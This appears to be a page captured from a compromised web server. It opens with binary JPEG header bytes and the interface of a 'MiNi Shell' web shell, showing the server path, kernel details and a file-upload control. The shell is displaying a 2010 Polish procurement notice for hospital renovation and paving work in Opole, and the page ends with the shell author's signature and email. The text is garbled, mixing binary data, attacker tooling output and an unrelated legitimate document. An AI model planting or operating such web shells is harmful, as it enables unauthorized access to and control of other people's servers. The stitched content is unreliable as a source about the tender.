JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100312/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100312/68988-N-2010.html

<p class="kh_header"><b>Opole: P/6/2010 Remont pomieszczeń w budynku głównym i schodów zewnętrznych oraz budowa ciągów pieszych</b><br>
<b>Numer ogłoszenia: 68988 - 2010; data zamieszczenia: 12.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny im. św. Jadwigi , ul. Wodociągowa 4, 45-221 Opole, woj. opolskie, tel. 077 5414100, faks 077 5414237.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszn.opole.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wszn.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> P/6/2010 Remont pomieszczeń w budynku głównym i schodów zewnętrznych oraz budowa ciągów pieszych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1- Remonty dwóch oddziałów oraz pomieszczeń w budynku głównym

1.1. Przedmiotem  zamówienia jest remont bieżący Oddziału Dziennej Rehabilitacji Psychiatrycznej, IV piętra oraz pojedynczych pomieszczeń w budynku głównym takich jak pomieszczenia kadr, księgowości, informatycznych, magazynu środków czystości, korytarza przy sali rehabilitacyjnej w piwnicy i na parterze  w budynku Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi ul. Wodociągowa 4, 45-221 Opole. 

Pakiet 2 - Ciągi piesze

1.1. Przedmiotem zamówienia są roboty drogowe polegające na wykonaniu z kostki brukowej ciągów pieszych wraz z wymianą krawężników i obrzeży betonowych na terenie należącym do Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi przy ul. Wodociągowej 4  

Pakiet 3 - Schody

1.1. Przedmiotem zamówienia są roboty remontowe schodów zewnętrznych polegające na wymianie istniejących płytek klinkierowych na płyt granitowe gr. 4 cm płomieniowane wraz z wykonaniem podbudowy betonowej. Dotyczy to schodów zewnętrznych przy budynku administracyjnym 2 szt. oraz schodów przy budynki psychiatrycznym a zlokalizowanych na terenie należącym do Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi przy ul. Wodociągowej 4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.43.00.00-0, 45.43.10.00-7, 45.43.21.11-5, 45.43.21.21-8, 45.42.11.00-5, 45.41.00.00-4, 45.44.21.00-8, 45.31.11.00-1, 45.23.32.51-3, 45.23.32.53-7, 45.26.25.10-9, 45.26.25.11-6, 45.26.25.12-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek określony w pkt. I. 2) siwz (tj. posiadania wiedzy i doświadczenia), jeżeli w okresie ostatnich pięciu lat przed upływem terminu składania ofert w niniejszym postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał min. jedną robotę budowlaną:
dla pakietu 1 - w zakresie wykonania robót budowlanych wykończeniowych o wartości brutto minimum 150.000 PLN (sto pięćdziesiąt tysięcy zł)
dla pakietu 2 - w zakresie wykonania nawierzchni z kostki brukowej o wartości brutto minimum 100.000 PLN (sto tysięcy zł)
dla pakietu 3 - w zakresie wykonania posadzek lub zewnętrznych elementów wykończeniowych z płyt granitowych  o wartości brutto minimum 20.000 PLN (dwadzieścia tysięcy zł)
Ocena spełniania warunków przez Wykonawców będzie dokonana w oparciu o kompletność i prawidłowość złożonych wraz z ofertą (z zastrzeżeniem art. 26 ust. 3 ww. ustawy), oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów wg formuły: spełnia/ nie spełnia.  Nie wykazanie przez Wykonawcę spełniania chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek określony w pkt. I. 3) siwz (tj.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia), jeżeli dysponuje 
minimum 1 (jedną) osobą posiadającą uprawnienia budowlane do pełnienia funkcji kierownika budowy w branży budowlanej,
Ocena spełniania warunków przez Wykonawców będzie dokonana w oparciu o kompletność i prawidłowość złożonych wraz z ofertą (z zastrzeżeniem art. 26 ust. 3 ww. ustawy), oświadczeń i dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów wg formuły: spełnia/ nie spełnia.  Nie wykazanie przez Wykonawcę spełniania chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia o spełnianiu warunków, o których mowa w art. 22 ust.1 Ustawy - wzór oświadczenia stanowi załącznik nr 3 do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Możliwe zmiany  postanowień przyszłej umowy w stosunku do treści oferty, na podstawie której dokonany będzie  wybór Wykonawcy, oraz określenie warunków takiej zmiany. (144. ust.  1 Ustawy): np. 
- zamawiający dopuszcza możliwość zmiany osób powołanych do wykonywania umowy (przedstawionych w ofercie w Wykazie osób..) i innych kluczowych specjalistów  na wniosek którejś ze stron w przypadku uzasadnionej konieczności wystąpienia takiej zmiany (np. w przypadkach: śmierci, choroby lub innych zdarzeń losowych, nie wywiązywania się osób z obowiązków wynikających z powierzonej im funkcji); lub jeżeli zmiana kluczowego specjalisty (osoby) stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy np. rezygnacja osoby; Zmiany wynikające z ww. przyczyn mogą nastąpić jedynie za zgodą strony przeciwnej. Ponadto Zamawiający może żądać od Wykonawcy zmiany osoby/-ób, jeżeli uzna, że nie wykonuje/-ją ona/-e swoich obowiązków wynikających z umowy. 	
W przypadku zmiany osoby, nowy specjalista/osoba musi spełniać wymagania określone dla danego specjalisty/-osoby; Wykonawca obowiązany jest zmienić osobę/ specjalistę w terminie wyznaczonym we wniosku Zamawiającego; 
- ewentualna zmiana cen może nastąpić jedynie w przypadku  dokonanej przez właściwy organ państwowy zmiany  stawki  podatku VAT; Wprowadzenie nowych cen musi się odbyć  w wysokości proporcjonalnej do wprowadzonych zmian, uwzględniających proporcjonalne zmiany ww czynnika cenotwórczego;
- może nastąpić przedłużenie terminu wykonywania przedmiotu umowy o czas wynikający z zaistnienia istotnych przeszkód, które spowodują wstrzymanie robót, tj. niekorzystnych warunków atmosferycznych typu opady ciągłe, deszcz, śnieg, temperatura powietrza poniżej 5 st. C, o czas wynikający z zawieszenia robót spowodowany wystąpieniem niekorzystnych zjawisk atmosferycznych. Wykonawca musi udokumentować okres niekorzystnych warunków atmosferycznych - dotyczy robot wykonywanych za zewnątrz budynków Może nastąpić przedłużenie terminu wykonywania przedmiotu umowy również w przypadku zmiany terminów dokonania ustalonych odbiorów, jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu; zawieszenia robót przez Zamawiającego lub inny uprawniony podmiot, w zakresie jaki będzie on miał wpływ na wykonanie robót będących przedmiotem niniejszego zamówienia; 
- może nastąpić zmiana sposobu wykonywania jakiegoś elementu prac, zmiana w dokumentacji projektowej w trakcie realizacji robót, wynikająca ze zmiany przepisów prawnych, które nastąpią po dniu złożenia ofert, w zakresie adekwatnym do zmian wynikających ze zmiany przepisów prawa w zakresie niezmiennej ceny ryczałtowej; 
- zamawiający dopuszcza możliwość zmiany umowy w zakresie wykonania robót zamiennych w ramach niniejszego zadania np. w przypadku zmian dokumentacji projektowej lub technologii wykonania (na wniosek którejś ze stron) w ramach niezmiennej ceny ryczałtowej za wykonanie całego zadania; Rozliczenie robót zamiennych nastąpi na podstawie cen jednostkowych zawartych w ofercie wykonawcy, a jeżeli oferta nie będzie posiadała takich cen jednostkowych, rozliczenie nastąpi na podstawie ogólnodostępnych, publikowanych katalogów za ostatni kwartał poprzedzający złożenie oferty. Przez roboty zamienne należy rozumieć roboty, które należy wykonać w związku z konieczną zmianą dokumentacji projektowej, wprowadzoną po dniu złożenia oferty przez wykonawcę, a wynikającą z istotnych błędów w dokumentacji technicznej i konieczności ich naprawienia, jeżeli są one uzasadnione zwiększeniem bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy lub wynikają ze zmiany przepisów prawa; Roboty zamienne nie są robotami dodatkowymi i nie mogą wykraczać poza zakres określony dokumentacją techniczną. Roboty zamienne należy utożsamiać z rozwiązaniami zamiennymi, o których mowa w art. 20 ust. 1 pkt 4 lit. b ustawy - Prawo budowlane. Wprowadzanie rozwiązań zamiennych w stosunku do przewidzianych w projekcie ma służyć sprawnej realizacji zamierzenia inwestycyjnego.
- może nastąpić przedłużenie terminu wykonywania przedmiotu umowy o czas wynikający z zaistnienia istotnych przeszkód, które spowodują wstrzymanie robót, tj. niekorzystnych warunków atmosferycznych typu opady ciągłe, deszcz, śnieg, temperatura powietrza poniżej 5 st. C, o czas wynikający z zawieszenia robót spowodowany wystąpieniem niekorzystnych zjawisk atmosferycznych. Wykonawca musi udokumentować okres niekorzystnych warunków atmosferycznych;

- nie przewiduje się innych zmian. 

Określenie warunków dokonywania ww zmian do umowy; Strona wnosząca o zmiany inicjuje zmianę pisemnie podając: opis zmiany, uzasadnianie zmiany, czas wykonania zmiany (jeżeli wymaga); wpływ zmiany na termin zakończenia realizacji umowy, przedstawia propozycję aneksu do umowy.
Uwaga: Wszystkie zmiany wymagają zgody Zamawiającego w formie sporządzonego i podpisanego przez obie strony aneksu. Każda ze stron jest upoważniona do wystąpienia o takie zmiany
Uwaga: 
- Wszystkie zmiany wymagają zgody stron w formie sporządzonego i podpisanego przez obie strony aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszn.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny  im. św. Jadwigi
ul.  Wodociągowa  4, 45-221 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2010 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny  im. św. Jadwigi
ul.  Wodociągowa  4, 45-221 Opole.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1- Remonty dwóch oddziałów oraz pomieszczeń w budynku głównym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> .1. Przedmiotem  zamówienia jest remont bieżący Oddziału Dziennej Rehabilitacji Psychiatrycznej, IV piętra oraz pojedynczych pomieszczeń w budynku głównym takich jak pomieszczenia kadr, księgowości, informatycznych, magazynu środków czystości, korytarza przy sali rehabilitacyjnej w piwnicy i na parterze  w budynku Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi ul. Wodociągowa 4, 45-221 Opole. 

1.2. Szczegółowy zakres robót określa: specyfikacja techniczna wykonania   i odbioru robót - załącznik nr 5 oraz przedmiar robót - załącznik nr 6/1 oraz załącznik nr 8 - Inwentaryzacja IV p..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.00.00-0, 45.43.10.00-7, 45.43.21.11-5, 45.43.21.21-8, 45.42.11.00-5, 45.41.00.00-4, 45.44.21.00-8, 45.31.11.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Ciągi piesze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia są roboty drogowe polegające na wykonaniu z kostki brukowej ciągów pieszych wraz z wymianą krawężników i obrzeży betonowych na terenie należącym do Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi przy ul. Wodociągowej 4  

1.2. Szczegółowy zakres robót określa: specyfikacja techniczna wykonania   i odbioru robót - załącznik nr 5 oraz przedmiar robót - załącznik nr 6/2 oraz  załącznik nr 7 str. 1 i 2- Plan zagospodarowania terenu ciągów pieszych (oznaczono na czerwono).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.51-3, 45.23.32.52-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Schody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia są roboty remontowe schodów zewnętrznych polegające na wymianie istniejących płytek klinkierowych na płyt granitowe gr. 4 cm płomieniowane wraz z wykonaniem podbudowy betonowej. Dotyczy to schodów zewnętrznych przy budynku administracyjnym 2 szt. oraz schodów przy budynki psychiatrycznym a zlokalizowanych na terenie należącym do Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi przy ul. Wodociągowej 4  

1.2. Szczegółowy zakres robót określa: specyfikacja techniczna wykonania i odbioru robót - załącznik nr 5 oraz przedmiar robót - załącznik nr 6/3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.25.10-9, 45.26.25.11-6, 45.26.25.12-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com